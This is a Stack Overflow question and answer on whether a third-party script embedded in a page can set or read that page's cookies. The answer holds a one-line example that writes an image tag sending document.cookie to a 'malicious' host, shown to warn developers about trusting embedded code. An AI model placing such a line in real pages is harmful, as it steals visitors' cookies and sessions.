
javascript - Can a third-party script set a first-party cookie? - Stack Overflow


I've read a lot of content online about cookies, but nothing addressing this question: Let's say I have a server at a and a web page served by b embeds a script in that web page which lives on my server:

<script src='a/script.js'></script>

What is that script allowed to do in terms of setting cookies? Can it set a cookie with domain=a? I'd assume so since the script is served from that domain. Can it also set a cookie with domain=b since the page is served from that server?

I'm trying to get my head around what "first-party" and "third-party" mean in the context of my script called from another host's web page.

asked Nov 24, 2013 at 1:30 by user3026299; edited Sep 1, 2015 at 21:47 by Deduplicator

1 Answer

Score: 8

I don't believe the origin of a .js file is relevant. The cookie domain has to do with the domain of the document being rendered.

If I visit http://www.b./ and it includes

<script src="http://www.a./some/file.js"></script>

Then b. is trusting a.'s code to act in good faith. The code executes as part of the page being viewed. Since the JavaScript code will execute in the browser, it could read cookies from b. and pass that data along by creating an `<img>` tag in the document where src includes the data.

For example, if a.'s javascript file includes

document.writeln("<img src='http://www.a./evil/data/capturer?" + document.cookie + "'>");

Then the malicious webmaster of a. could check his web server logs and see b.'s cookies.

So, the question is, if a. is malicious, why did b. include code from a. in their page? They probably didn't. As web developers, we need to verify the trustworthiness of any 3rd party code we embed in our sites.
